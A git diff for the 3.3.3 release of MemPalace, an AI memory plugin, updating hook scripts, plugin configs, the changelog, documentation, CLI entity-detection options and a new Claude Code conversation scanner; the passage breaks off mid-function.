diff --git a/.claude-plugin/.mcp.json b/.claude-plugin/.mcp.json
index b1e81ed81..dd7d55d74 100644
--- a/.claude-plugin/.mcp.json
+++ b/.claude-plugin/.mcp.json
@@ -1,9 +1,5 @@
 {
   "mempalace": {
-    "command": "python3",
-    "args": [
-      "-m",
-      "mempalace.mcp_server"
-    ]
+    "command": "mempalace-mcp"
   }
 }
diff --git a/.claude-plugin/hooks/mempal-precompact-hook.sh b/.claude-plugin/hooks/mempal-precompact-hook.sh
index 0ac46ddc4..19bb6b0d4 100644
--- a/.claude-plugin/hooks/mempal-precompact-hook.sh
+++ b/.claude-plugin/hooks/mempal-precompact-hook.sh
@@ -1,5 +1,24 @@
 #!/bin/bash
 # MemPalace PreCompact Hook — thin wrapper calling Python CLI
 # All logic lives in mempalace.hooks_cli for cross-harness extensibility
-INPUT=$(cat)
-echo "$INPUT" | python3 -m mempalace hook run --hook precompact --harness claude-code
+# Run `mempalace hook run "$@"` through the first entry point that works: the
+# `mempalace` console script, then `python3 -m mempalace`, then `python -m mempalace`.
+# Stdin (the hook payload) goes to that command; import probes read /dev/null so
+# they cannot consume it. Returns its exit status, or 1 if nothing is runnable.
+run_mempalace_hook() {
+  local py
+  if command -v mempalace >/dev/null 2>&1; then
+    mempalace hook run "$@"
+    return
+  fi
+  for py in python3 python; do
+    if command -v "$py" >/dev/null 2>&1 && "$py" -c "import mempalace" </dev/null >/dev/null 2>&1; then
+      "$py" -m mempalace hook run "$@"
+      return
+    fi
+  done
+  echo "MemPalace hook error: could not find a runnable mempalace command or module" >&2
+  return 1
+}
+
+run_mempalace_hook --hook precompact --harness claude-code
diff --git a/.claude-plugin/hooks/mempal-stop-hook.sh b/.claude-plugin/hooks/mempal-stop-hook.sh
index cba328496..5c860b47c 100644
--- a/.claude-plugin/hooks/mempal-stop-hook.sh
+++ b/.claude-plugin/hooks/mempal-stop-hook.sh
@@ -1,5 +1,24 @@
 #!/bin/bash
 # MemPalace Stop Hook — thin wrapper calling Python CLI
 # All logic lives in mempalace.hooks_cli for cross-harness extensibility
-INPUT=$(cat)
-echo "$INPUT" | python3 -m mempalace hook run --hook stop --harness claude-code
+# Run `mempalace hook run "$@"` through the first entry point that works: the
+# `mempalace` console script, then `python3 -m mempalace`, then `python -m mempalace`.
+# Stdin (the hook payload) goes to that command; import probes read /dev/null so
+# they cannot consume it. Returns its exit status, or 1 if nothing is runnable.
+run_mempalace_hook() {
+  local py
+  if command -v mempalace >/dev/null 2>&1; then
+    mempalace hook run "$@"
+    return
+  fi
+  for py in python3 python; do
+    if command -v "$py" >/dev/null 2>&1 && "$py" -c "import mempalace" </dev/null >/dev/null 2>&1; then
+      "$py" -m mempalace hook run "$@"
+      return
+    fi
+  done
+  echo "MemPalace hook error: could not find a runnable mempalace command or module" >&2
+  return 1
+}
+
+run_mempalace_hook --hook stop --harness claude-code
diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json
index be85be35c..aa15e5b26 100644
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -9,7 +9,7 @@
       "name": "mempalace",
       "source": "./.claude-plugin",
       "description": "AI memory system — mine projects and conversations into a searchable palace. 19 MCP tools, auto-save hooks, guided setup.",
-      "version": "3.3.2",
+      "version": "3.3.3",
       "author": {
         "name": "milla-jovovich"
       }
diff --git a/.claude-plugin/plugin.json b/.claude-plugin/plugin.json
index a1a337721..a1b69a61d 100644
--- a/.claude-plugin/plugin.json
+++ b/.claude-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "mempalace",
-  "version": "3.3.2",
+  "version": "3.3.3",
   "description": "Give your AI a memory — mine projects and conversations into a searchable palace. 19 MCP tools, auto-save hooks, and guided setup.",
   "author": {
     "name": "milla-jovovich"
@@ -9,11 +9,7 @@
   "commands": [],
   "mcpServers": {
     "mempalace": {
-      "command": "python3",
-      "args": [
-        "-m",
-        "mempalace.mcp_server"
-      ]
+      "command": "mempalace-mcp"
     }
   },
   "keywords": [
diff --git a/.codex-plugin/hooks/mempal-hook.sh b/.codex-plugin/hooks/mempal-hook.sh
index 1cc005014..6d1113a41 100644
--- a/.codex-plugin/hooks/mempal-hook.sh
+++ b/.codex-plugin/hooks/mempal-hook.sh
@@ -3,7 +3,7 @@ set -euo pipefail
 HOOK_NAME="${1:?Usage: mempal-hook.sh <hook-name>}"
 INPUT_FILE=$(mktemp) || { echo "Failed to create temp file" >&2; exit 1; }
 cat > "$INPUT_FILE"
-cat "$INPUT_FILE" | python3 -m mempalace hook run --hook "$HOOK_NAME" --harness codex
+cat "$INPUT_FILE" | mempalace hook run --hook "$HOOK_NAME" --harness codex
 EXIT_CODE=$?
 rm -f "$INPUT_FILE" 2>/dev/null
 exit $EXIT_CODE
diff --git a/.codex-plugin/plugin.json b/.codex-plugin/plugin.json
index 41d55fb21..16b66bb3a 100644
--- a/.codex-plugin/plugin.json
+++ b/.codex-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "mempalace",
-  "version": "3.3.2",
+  "version": "3.3.3",
   "description": "Give your AI a memory — mine projects and conversations into a searchable palace. 19 MCP tools, auto-save hooks, and guided setup.",
   "author": {
     "name": "milla-jovovich"
@@ -21,11 +21,7 @@
   "hooks": "./hooks.json",
   "mcpServers": {
     "mempalace": {
-      "command": "python3",
-      "args": [
-        "-m",
-        "mempalace.mcp_server"
-      ]
+      "command": "mempalace-mcp"
     }
   },
   "interface": {
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 483b8aa4d..2051ab360 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,44 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 
 ---
 
+## [3.3.3] — 2026-04-23
+
+### Bug Fixes
+
+- **Install regression** — `mempalace-mcp` console script is now declared in `pyproject.toml` alongside `.claude-plugin/plugin.json`'s reference to it. In v3.3.2 the two drifted apart (plugin.json shipped the new `"command": "mempalace-mcp"` form before the matching entry point landed), so every fresh `pip install mempalace==3.3.2` produced a Claude Code plugin config pointing at a binary that wasn't installed. (#1093, #340)
+- Restore silent-save visibility after the Claude Code 2.1.114 client regression — production transcript saves were failing silently until this release. (#1021)
+- Paginate `status`-path metadata fetches so large palaces don't trip SQLite variable limits. (#851)
+- Resolve the Claude plugin hook runner across platform / plugin-dir variations; previously broke on Windows and some macOS layouts. (#942)
+- Real `python3` resolution for `.sh` hooks with a `MEMPAL_PYTHON` override path. (#833)
+- Add optional `wing` parameter to `tool_diary_write` / `tool_diary_read` and derive per-project wing from the Claude Code transcript path when writing from the stop hook — diary entries from different projects no longer collapse into a shared default wing. (#659)
+- Treat empty string as "no filter" in `mempalace_search` `wing`/`room`; LLM agents that default to filling every optional parameter with `""` no longer get bounced with `must be a non-empty string`. (#1097, #1084)
+- Broaden `_wing_from_transcript_path` to handle Claude Code project folders without a `-Projects-` segment (e.g. `~/dev/<parent>/<project>`, `~/code/<project>`). The project name is now derived from the final dash-separated token of the encoded folder, so Linux users with code outside `~/Projects/` get per-project diary scoping instead of falling through to `wing_sessions`. (#1145, follow-up to #659)
+- `mempalace_diary_read(wing="")` now returns diary entries from every wing this agent has written to, matching the #1097 "empty-string as no filter" pattern. Previously defaulted to `wing_<agent>`, siloing entries that hooks wrote to project-derived wings. (#1145)
+- `mempalace mine` now skips the generated `entities.json` file so its contents aren't re-ingested as project content. (#1175)
+
+### Improvements
+
+- **Deterministic hook saves.** Save hook now uses a silent Python API path, so successive hook invocations produce reproducible results and zero data loss on the hot path. (#673)
+- **Graph cache with write-invalidation** inside `build_graph()` — warm-path calls no longer rebuild the palace-graph per request. (#661)
+- **`mempalace init` entity detection overhaul.** Canonical project names now come from package manifests (`package.json`, `pyproject.toml`, `Cargo.toml`, `go.mod`) and real people come from git commit authors, rather than being inferred from prose. Includes union-find dedup across name/email aliases, bot filtering that keeps `@users.noreply.github.com` humans, and automatic "mine" flagging by contribution share. (#1148)
+- **Regex detector accuracy.** CamelCase extraction so `MemPalace`, `ChromaDB`, `OpenAI` aren't fragmented; tighter versioned/hyphenated pattern kills `context-manager` / `multi-word` false positives; dialogue `^NAME:\s` requires ≥2 hits so `Created: <date>` metadata stops classifying field names as people; expanded stopwords for common English participles and descriptors; high-pronoun signal classifies as person rather than dumping to uncertain. (#1148)
+- **Init → miner wire-up.** Confirmed entities merge into `~/.mempalace/known_entities.json` on init, which the miner reads to tag drawer metadata for entity-filtered search. Previously init's output was not consumed by the miner; the per-project `entities.json` is kept as an audit trail. (#1157)
+- **Case-insensitive project dedup** across manifest, git, and convo sources so casing variants of the same project name collapse into one review entry. (#1175)
+
+### Added
+
+- i18n: Belarusian translation. (#1051)
+- i18n: entity detection for German, Spanish, and French locales. (#1001)
+- i18n: Traditional + Simplified Chinese entity detection. (#945)
+- **`mempalace init --llm`**: optional LLM-assisted entity classification. Defaults to local Ollama (zero-API); also supports any OpenAI-compatible endpoint (LM Studio, llama.cpp server, vLLM, OpenRouter, etc.) and the Anthropic Messages API. Runs interactively with a progress indicator; Ctrl-C cancels cleanly and returns partial results. Useful for prose-heavy folders where the regex detector struggles (diaries, transcripts, research notes). Opt-in only — default init path remains zero-API. (#1150)
+- **Claude Code conversation scanner.** `~/.claude/projects/<slug>/` directories now contribute project entities using each session's authoritative `cwd` metadata, avoiding slug-decoding ambiguity. (#1150)
+
+### Known — deferred to v3.3.4
+
+- HNSW parallel-insert SIGSEGV when `hnsw:num_threads` is unset on collection creation (#974) — fix in-flight as #976, awaiting rebase against develop.
+
+---
+
 ## [3.3.2] — 2026-04-19
 
 ### Bug Fixes
diff --git a/README.md b/README.md
index 97cb4b006..acbeb143f 100644
--- a/README.md
+++ b/README.md
@@ -177,7 +177,7 @@ PRs welcome. See [CONTRIBUTING.md](CONTRIBUTING.md).
 MIT — see [LICENSE](LICENSE).
 
 <!-- Link Definitions -->
-[version-shield]: https://img.shields.io/badge/version-3.3.2-4dc9f6?style=flat-square&labelColor=0a0e14
+[version-shield]: https://img.shields.io/badge/version-3.3.3-4dc9f6?style=flat-square&labelColor=0a0e14
 [release-link]: https://github.com/MemPalace/mempalace/releases
 [python-shield]: https://img.shields.io/badge/python-3.9+-7dd8f8?style=flat-square&labelColor=0a0e14&logo=python&logoColor=7dd8f8
 [python-link]: https://www.python.org/
diff --git a/examples/HOOKS_TUTORIAL.md b/examples/HOOKS_TUTORIAL.md
index 1b09467fd..3a34b81c2 100644
--- a/examples/HOOKS_TUTORIAL.md
+++ b/examples/HOOKS_TUTORIAL.md
@@ -25,4 +25,27 @@ Add this to your configuration file to enable automatic background saving:
       }
     ]
   }
-}
\ No newline at end of file
+}
+```
+
+### 3. What changed (v3.1.0+)
+
+Both hooks now have **two-layer capture**:
+
+1. **Auto-mine**: Before blocking the AI, the hook runs the normalizer on the JSONL transcript and upserts chunks directly into the palace. This captures raw tool output (Bash results, search findings, build errors) that the AI would otherwise summarize away.
+
+2. **Updated reason messages**: The block reason now explicitly tells the AI to save tool output verbatim — not just topics and decisions.
+
+### 4. Backfill past conversations (one-time)
+
+The hooks capture conversations going forward, but you probably have months of past sessions. Run this once to mine them all:
+
+```bash
+mempalace mine ~/.claude/projects/ --mode convos
+```
+
+### 5. Configuration
+
+- **`SAVE_INTERVAL=15`** — How many human messages between saves
+- **`MEMPAL_PYTHON`** — Optional path to the Python 3 interpreter the hooks use to parse their JSON input. Resolution order: `$MEMPAL_PYTHON` (if set and executable) → `$(command -v python3)` → bare `python3`
+- **`MEMPAL_DIR`** — Optional directory for auto-ingest via `mempalace mine`
\ No newline at end of file
diff --git a/examples/mcp_setup.md b/examples/mcp_setup.md
index 9bc26dd61..2b7e1c3bf 100644
--- a/examples/mcp_setup.md
+++ b/examples/mcp_setup.md
@@ -5,13 +5,13 @@
 Run the MCP server:
 
 ```bash
-python -m mempalace.mcp_server
+mempalace-mcp
 ```
 
 Or add it to Claude Code:
 
 ```bash
-claude mcp add mempalace -- python -m mempalace.mcp_server
+claude mcp add mempalace -- mempalace-mcp
 ```
 
 ## Available Tools
diff --git a/hooks/README.md b/hooks/README.md
index 977b109ed..7794527dd 100644
--- a/hooks/README.md
+++ b/hooks/README.md
@@ -6,10 +6,10 @@ These hook scripts make MemPalace save automatically. No manual "save" commands
 
 | Hook | When It Fires | What Happens |
 |------|--------------|-------------|
-| **Save Hook** | Every 15 human messages | Blocks the AI, tells it to save key topics/decisions/quotes to the palace |
-| **PreCompact Hook** | Right before context compaction | Emergency save — forces the AI to save EVERYTHING before losing context |
+| **Save Hook** | Every 15 human messages | Auto-mines transcript (tool output included), then blocks the AI to save topics/decisions/quotes |
+| **PreCompact Hook** | Right before context compaction | Auto-mines transcript, then emergency save — forces the AI to save EVERYTHING before losing context |
 
-The AI does the actual filing — it knows the conversation context, so it classifies memories into the right wings/halls/closets. The hooks just tell it WHEN to save.
+**Two-layer capture:** Hooks auto-mine the JSONL transcript directly into the palace (capturing raw tool output — Bash results, search findings, build errors). They also block the AI with a reason message telling it to save verbatim tool output and key context. Belt and suspenders — tool output gets stored even if the AI summarizes instead of quoting.
 
 ## Install — Claude Code
 
@@ -68,6 +68,7 @@ Edit `mempal_save_hook.sh` to change:
 - **`SAVE_INTERVAL=15`** — How many human messages between saves. Lower = more frequent saves, higher = less interruption.
 - **`STATE_DIR`** — Where hook state is stored (defaults to `~/.mempalace/hook_state/`)
 - **`MEMPAL_DIR`** — Optional. Set to a conversations directory to auto-run `mempalace mine <dir>` on each save trigger. Leave blank (default) to let the AI handle saving via the block reason message.
+- **`MEMPAL_PYTHON`** — Optional env var. Python 3 interpreter the hook uses for its internal JSON parsing and message counting. Resolution order: `$MEMPAL_PYTHON` (if set and executable) → `$(command -v python3)` → bare `python3`. Set this if `python3` is not on the hook's `PATH`.
 
 ### mempalace CLI
 
@@ -91,15 +92,19 @@ User sends message → AI responds → Claude Code fires Stop hook
                                             ↓
                               ┌─── < 15 since last save ──→ echo "{}" (let AI stop)
                               │
-                              └─── ≥ 15 since last save ──→ {"decision": "block", "reason": "save..."}
-                                                                    ↓
-                                                            AI saves to palace
-                                                                    ↓
-                                                            AI tries to stop again
-                                                                    ↓
-                                                            stop_hook_active = true
-                                                                    ↓
-                                                            Hook sees flag → echo "{}" (let it through)
+                              └─── ≥ 15 since last save
+                                            ↓
+                                    Auto-mine transcript → palace (tool output captured)
+                                            ↓
+                                    {"decision": "block", "reason": "save tool output verbatim..."}
+                                            ↓
+                                    AI saves to palace (topics, decisions, quotes)
+                                            ↓
+                                    AI tries to stop again
+                                            ↓
+                                    stop_hook_active = true
+                                            ↓
+                                    Hook sees flag → echo "{}" (let it through)
 ```
 
 The `stop_hook_active` flag prevents infinite loops: block once → AI saves → tries to stop → flag is true → we let it through.
@@ -109,14 +114,18 @@ The `stop_hook_active` flag prevents infinite loops: block once → AI saves →
 ```
 Context window getting full → Claude Code fires PreCompact
                                         ↓
-                                Hook ALWAYS blocks
+                                Find transcript (from input or session_id lookup)
+                                        ↓
+                                Auto-mine transcript → palace (tool output captured)
+                                        ↓
+                                {"decision": "block", "reason": "save tool output verbatim..."}
                                         ↓
                                 AI saves everything
                                         ↓
                                 Compaction proceeds
 ```
 
-No counting needed — compaction always warrants a save.
+No counting needed — compaction always warrants a save. The auto-mine captures raw tool output before the AI gets a chance to summarize it away.
 
 ## Debugging
 
@@ -137,6 +146,36 @@ Example output:
 
 **Hooks require session restart after install.** Claude Code loads hooks from `settings.json` at session start only. If you run `mempalace init` or manually edit hook config mid-session, the hooks won't fire until you restart Claude Code. This is a Claude Code limitation.
 
+**`MEMPAL_PYTHON` override for the hook's internal Python calls.** The save hook parses its JSON input and counts transcript messages with `python3`. When the harness is launched from a GUI on macOS — `open -a`, Spotlight, the dock — its `PATH` is the minimal `/usr/bin:/bin:/usr/sbin:/sbin` inherited from `launchd`, not your shell PATH. If `python3` isn't on that PATH, those internal calls fail and the hook can't count exchanges.
+
+Point the hook at any Python 3 interpreter to fix it:
+
+```bash
+export MEMPAL_PYTHON="/usr/bin/python3"                   # system Python is fine
+export MEMPAL_PYTHON="$HOME/.venvs/mempalace/bin/python"  # or your venv
+```
+
+Resolution priority: `$MEMPAL_PYTHON` (if set and executable) → `$(command -v python3)` → bare `python3`. The interpreter only needs `json` and `sys` from the standard library — `mempalace` itself does not need to be installed in it.
+
+Note: the `mempalace mine` auto-ingest runs via the `mempalace` CLI, so that command also needs to be on the hook's `PATH`. Installing with `pipx install mempalace` or `uv tool install mempalace` puts it on a stable global location; otherwise extend the hook environment's `PATH` to include your venv's `bin/`.
+
+## Backfill Past Conversations
+
+The hooks only capture conversations going forward. To mine **past** Claude Code sessions into your palace, run a one-time backfill:
+
+```bash
+mempalace mine ~/.claude/projects/ --mode convos
+```
+
+This scans all JSONL transcripts from previous sessions and files them into the `conversations` wing. On a typical developer machine with months of history, this can yield 50K–200K drawers.
+
+For Codex CLI sessions:
+```bash
+mempalace mine ~/.codex/sessions/ --mode convos
+```
+
+This only needs to be done once — after that, the hooks auto-mine each session as you go.
+
 ## Cost
 
 **Zero extra tokens.** The hooks notify the AI that saves happened in the background — the AI doesn't need to write anything in the chat. All filing is handled automatically. Previous versions asked the AI to write diary entries and drawer content in the chat window, which cost ~$1/session in retransmitted tokens.
diff --git a/hooks/mempal_precompact_hook.sh b/hooks/mempal_precompact_hook.sh
index 3a74ca54e..a14a0d0e9 100755
--- a/hooks/mempal_precompact_hook.sh
+++ b/hooks/mempal_precompact_hook.sh
@@ -54,10 +54,17 @@ mkdir -p "$STATE_DIR"
 # Leave empty to skip auto-ingest (AI handles saving via the block reason).
 MEMPAL_DIR=""
 
+# Resolve the Python interpreter. Same contract as mempal_save_hook.sh:
+# MEMPAL_PYTHON (explicit override) → $(command -v python3) → bare python3.
+MEMPAL_PYTHON_BIN="${MEMPAL_PYTHON:-}"
+if [ -z "$MEMPAL_PYTHON_BIN" ] || [ ! -x "$MEMPAL_PYTHON_BIN" ]; then
+    MEMPAL_PYTHON_BIN="$(command -v python3 2>/dev/null || echo python3)"
+fi
+
 # Read JSON input from stdin
 INPUT=$(cat)
 
-SESSION_ID=$(echo "$INPUT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('session_id','unknown'))" 2>/dev/null)
+SESSION_ID=$(echo "$INPUT" | "$MEMPAL_PYTHON_BIN" -c "import sys,json; print(json.load(sys.stdin).get('session_id','unknown'))" 2>/dev/null)
 
 echo "[$(date '+%H:%M:%S')] PRE-COMPACT triggered for session $SESSION_ID" >> "$STATE_DIR/hook.log"
 
@@ -65,7 +72,7 @@ echo "[$(date '+%H:%M:%S')] PRE-COMPACT triggered for session $SESSION_ID" >> "$
 if [ -n "$MEMPAL_DIR" ] && [ -d "$MEMPAL_DIR" ]; then
     SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
     REPO_DIR="$(dirname "$SCRIPT_DIR")"
-    python3 -m mempalace mine "$MEMPAL_DIR" >> "$STATE_DIR/hook.log" 2>&1
+    mempalace mine "$MEMPAL_DIR" >> "$STATE_DIR/hook.log" 2>&1
 fi
 
 # Silent: return empty JSON to not block. "decision": "allow" is invalid —
diff --git a/hooks/mempal_save_hook.sh b/hooks/mempal_save_hook.sh
index d8e7cc248..228b41bac 100755
--- a/hooks/mempal_save_hook.sh
+++ b/hooks/mempal_save_hook.sh
@@ -61,13 +61,30 @@ mkdir -p "$STATE_DIR"
 # Leave empty to skip auto-ingest (AI handles saving via the block reason).
 MEMPAL_DIR=""
 
+# Resolve the Python interpreter the hook should use.
+#
+# Why this is nontrivial: GUI-launched Claude Code on macOS (or any harness
+# that doesn't inherit the user's shell PATH) may run with a minimal PATH
+# where `python3` is missing or is not the one the user expects. This
+# interpreter runs the inline JSON parsing and transcript counting below;
+# users can pick it explicitly by exporting MEMPAL_PYTHON.
+#
+# Resolution order (first hit wins):
+#   1. $MEMPAL_PYTHON          — explicit user override (absolute path)
+#   2. $(command -v python3)   — first python3 on the hook's PATH
+#   3. bare "python3"          — last-resort fallback (hope the PATH has it)
+MEMPAL_PYTHON_BIN="${MEMPAL_PYTHON:-}"
+if [ -z "$MEMPAL_PYTHON_BIN" ] || [ ! -x "$MEMPAL_PYTHON_BIN" ]; then
+    MEMPAL_PYTHON_BIN="$(command -v python3 2>/dev/null || echo python3)"
+fi
+
 # Read JSON input from stdin
 INPUT=$(cat)
 
 # Parse all fields in a single Python call (3x faster than separate invocations)
 # SECURITY: All values are sanitized before being interpolated into shell assignments.
 # stop_hook_active is coerced to a strict True/False to prevent command injection via eval.
-eval $(echo "$INPUT" | python3 -c "
+eval $(echo "$INPUT" | "$MEMPAL_PYTHON_BIN" -c "
 import sys, json, re
 data = json.load(sys.stdin)
 sid = data.get('session_id', 'unknown')
@@ -95,7 +112,7 @@ fi
 # Count human messages in the JSONL transcript
 # SECURITY: Pass transcript path as sys.argv to avoid shell injection via crafted paths
 if [ -f "$TRANSCRIPT_PATH" ]; then
-    EXCHANGE_COUNT=$(python3 - "$TRANSCRIPT_PATH" <<'PYEOF'
+    EXCHANGE_COUNT=$("$MEMPAL_PYTHON_BIN" - "$TRANSCRIPT_PATH" <<'PYEOF'
 import json, sys
 count = 0
 with open(sys.argv[1]) as f:
@@ -144,7 +161,6 @@ if [ "$SINCE_LAST" -ge "$SAVE_INTERVAL" ] && [ "$EXCHANGE_COUNT" -gt 0 ]; then
     # 1. TRANSCRIPT_PATH (from Claude Code) — mine the directory it lives in
     # 2. MEMPAL_DIR (user-configured) — mine that directory
     # At least one should work. If neither is set, nothing mines.
-    PYTHON="$(command -v python3)"
     MINE_DIR=""
     if [ -n "$TRANSCRIPT_PATH" ] && [ -f "$TRANSCRIPT_PATH" ]; then
         MINE_DIR="$(dirname "$TRANSCRIPT_PATH")"
@@ -153,7 +169,7 @@ if [ "$SINCE_LAST" -ge "$SAVE_INTERVAL" ] && [ "$EXCHANGE_COUNT" -gt 0 ]; then
         MINE_DIR="$MEMPAL_DIR"
     fi
     if [ -n "$MINE_DIR" ]; then
-        "$PYTHON" -m mempalace mine "$MINE_DIR" >> "$STATE_DIR/hook.log" 2>&1 &
+        mempalace mine "$MINE_DIR" >> "$STATE_DIR/hook.log" 2>&1 &
     fi
 
     # MEMPAL_VERBOSE toggle:
diff --git a/mempalace/backends/chroma.py b/mempalace/backends/chroma.py
index 1a171c167..3a0d2c3f9 100644
--- a/mempalace/backends/chroma.py
+++ b/mempalace/backends/chroma.py
@@ -120,8 +120,7 @@ def quarantine_stale_hnsw(palace_path: str, stale_seconds: float = 3600.0) -> li
             os.rename(seg_dir, target)
             moved.append(target)
             logger.warning(
-                "Quarantined stale HNSW segment %s "
-                "(sqlite %.0fs newer than HNSW); renamed to %s",
+                "Quarantined stale HNSW segment %s (sqlite %.0fs newer than HNSW); renamed to %s",
                 seg_dir,
                 sqlite_mtime - hnsw_mtime,
                 target,
diff --git a/mempalace/cli.py b/mempalace/cli.py
index a4c8a886c..714c64c7b 100644
--- a/mempalace/cli.py
+++ b/mempalace/cli.py
@@ -71,7 +71,8 @@ def _ensure_mempalace_files_gitignored(project_dir) -> bool:
 def cmd_init(args):
     import json
     from pathlib import Path
-    from .entity_detector import scan_for_detection, detect_entities, confirm_entities
+    from .entity_detector import confirm_entities
+    from .project_scanner import discover_entities
     from .room_detector_local import detect_rooms_local
 
     cfg = MempalaceConfig()
@@ -85,25 +86,55 @@ def cmd_init(args):
         languages = cfg.entity_languages
     languages_tuple = tuple(languages)
 
-    # Pass 1: auto-detect people and projects from file content
+    # Optional phase-2 LLM provider (opt-in via --llm).
+    llm_provider = None
+    if getattr(args, "llm", False):
+        from .llm_client import LLMError, get_provider
+
+        try:
+            llm_provider = get_provider(
+                name=args.llm_provider,
+                model=args.llm_model,
+                endpoint=args.llm_endpoint,
+                api_key=args.llm_api_key,
+            )
+        except LLMError as e:
+            print(f"  ERROR: {e}", file=sys.stderr)
+            sys.exit(2)
+        ok, msg = llm_provider.check_available()
+        if not ok:
+            print(
+                f"  ERROR: LLM provider '{args.llm_provider}' unavailable: {msg}",
+                file=sys.stderr,
+            )
+            sys.exit(2)
+        print(f"  LLM refinement enabled: {args.llm_provider}/{args.llm_model}")
+
+    # Pass 1: discover entities — manifests + git authors first, prose detection
+    # as supplement for names mentioned only in docs/notes. Optional phase-2
+    # LLM refinement runs inside discover_entities when llm_provider is given.
     print(f"\n  Scanning for entities in: {args.dir}")
     if languages_tuple != ("en",):
         print(f"  Languages: {', '.join(languages_tuple)}")
-    files = scan_for_detection(args.dir)
-    if files:
-        print(f"  Reading {len(files)} files...")
-        detected = detect_entities(files, languages=languages_tuple)
-        total = len(detected["people"]) + len(detected["projects"]) + len(detected["uncertain"])
-        if total > 0:
-            confirmed = confirm_entities(detected, yes=getattr(args, "yes", False))
-            # Save confirmed entities to <project>/entities.json for the miner
-            if confirmed["people"] or confirmed["projects"]:
-                entities_path = Path(args.dir).expanduser().resolve() / "entities.json"
-                with open(entities_path, "w") as f:
-                    json.dump(confirmed, f, indent=2)
-                print(f"  Entities saved: {entities_path}")
-        else:
-            print("  No entities detected — proceeding with directory-based rooms.")
+    detected = discover_entities(args.dir, languages=languages_tuple, llm_provider=llm_provider)
+    total = len(detected["people"]) + len(detected["projects"]) + len(detected["uncertain"])
+    if total > 0:
+        confirmed = confirm_entities(detected, yes=getattr(args, "yes", False))
+        # Save confirmed entities to <project>/entities.json (per-project
+        # audit trail — user can inspect or hand-edit) AND merge into the
+        # global registry the miner reads at mine time.
+        if confirmed["people"] or confirmed["projects"]:
+            entities_path = Path(args.dir).expanduser().resolve() / "entities.json"
+            with open(entities_path, "w", encoding="utf-8") as f:
+                json.dump(confirmed, f, indent=2, ensure_ascii=False)
+            print(f"  Entities saved: {entities_path}")
+
+            from .miner import add_to_known_entities
+
+            registry_path = add_to_known_entities(confirmed)
+            print(f"  Registry updated: {registry_path}")
+    else:
+        print("  No entities detected — proceeding with directory-based rooms.")
 
     # Pass 2: detect rooms from folder structure
     detect_rooms_local(project_dir=args.dir, yes=getattr(args, "yes", False))
@@ -367,7 +398,7 @@ def cmd_instructions(args):
 
 def cmd_mcp(args):
     """Show how to wire MemPalace into MCP-capable hosts."""
-    base_server_cmd = "python -m mempalace.mcp_server"
+    base_server_cmd = "mempalace-mcp"
 
     if args.palace:
         resolved_palace = str(Path(args.palace).expanduser())
@@ -551,6 +582,43 @@ def main():
             "When given, the value is also persisted to config.json."
         ),
     )
+    p_init.add_argument(
+        "--llm",
+        action="store_true",
+        help=(
+            "Enable LLM-assisted entity refinement (opt-in, local-first). "
+            "Runs after manifest/git/regex detection, asking the configured "
+            "provider to reclassify ambiguous candidates. "
+            "Ctrl-C during refinement returns partial results."
+        ),
+    )
+    p_init.add_argument(
+        "--llm-provider",
+        default="ollama",
+        choices=["ollama", "openai-compat", "anthropic"],
+        help="LLM provider (default: ollama). Use --llm to enable.",
+    )
+    p_init.add_argument(
+        "--llm-model",
+        default="gemma4:e4b",
+        help="Model name for the chosen provider (default: gemma4:e4b for Ollama).",
+    )
+    p_init.add_argument(
+        "--llm-endpoint",
+        default=None,
+        help=(
+            "Provider endpoint URL. Default for Ollama: http://localhost:11434. "
+            "Required for openai-compat."
+        ),
+    )
+    p_init.add_argument(
+        "--llm-api-key",
+        default=None,
+        help=(
+            "API key for the provider. For anthropic, defaults to $ANTHROPIC_API_KEY; "
+            "for openai-compat, defaults to $OPENAI_API_KEY."
+        ),
+    )
 
     # mine
     p_mine = sub.add_parser("mine", help="Mine files into the palace")
diff --git a/mempalace/config.py b/mempalace/config.py
index a9bcc7ffb..616334e5c 100644
--- a/mempalace/config.py
+++ b/mempalace/config.py
@@ -168,7 +168,10 @@ def palace_path(self):
         """Path to the memory palace data directory."""
         env_val = os.environ.get("MEMPALACE_PALACE_PATH") or os.environ.get("MEMPAL_PALACE_PATH")
         if env_val:
-            return env_val
+            # Normalize: expand ~ and collapse .. to match the CLI --palace
+            # code path (mcp_server.py:62) and prevent surprise redirection
+            # when the env var contains unresolved components.
+            return os.path.abspath(os.path.expanduser(env_val))
         return self._file_config.get("palace_path", DEFAULT_PALACE_PATH)
 
     @property
diff --git a/mempalace/convo_scanner.py b/mempalace/convo_scanner.py
new file mode 100644
index 000000000..b592494d6
--- /dev/null
+++ b/mempalace/convo_scanner.py
@@ -0,0 +1,160 @@
+"""
+convo_scanner.py — Parse Claude Code conversation directories into ProjectInfo.
+
+Claude Code stores sessions under ``~/.claude/projects/<slug>/<id>.jsonl``,
+where the ``<slug>`` is the original CWD with ``/`` replaced by ``-``. That
+encoding is lossy: we can't tell whether ``foo-bar`` in a slug is the
+literal project name ``foo-bar`` or two path segments ``foo/bar``.
+
+Fortunately, every message record in the JSONL carries a ``cwd`` field with
+the true path. This scanner reads one record per session to recover the
+accurate project name, falling back to slug-decoding only if the JSONL
+is malformed or empty.
+
+Output is the same ``ProjectInfo`` shape used by ``project_scanner``, so the
+``discover_entities`` orchestrator can mix-and-match sources.
+
+Public:
+    is_claude_projects_root(path) -> bool
+    scan_claude_projects(path) -> list[ProjectInfo]
+"""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+from typing import Optional
+
+from mempalace.project_scanner import ProjectInfo
+
+
+MAX_HEADER_LINES = 20  # lines to read per session looking for `cwd`
+
+
+def is_claude_projects_root(path: Path) -> bool:
+    """Report whether ``path`` has the layout of a `.claude/projects/` dir.
+
+    This is a heuristic: some immediate subdirectory must have a name that
+    begins with ``-`` and must hold at least one regular ``.jsonl`` file.
+    """
+    if not path.is_dir():
+        return False
+    try:
+        entries = list(path.iterdir())
+    except OSError:
+        return False
+    for entry in entries:
+        if entry.is_dir() and entry.name.startswith("-"):
+            try:
+                for item in entry.iterdir():
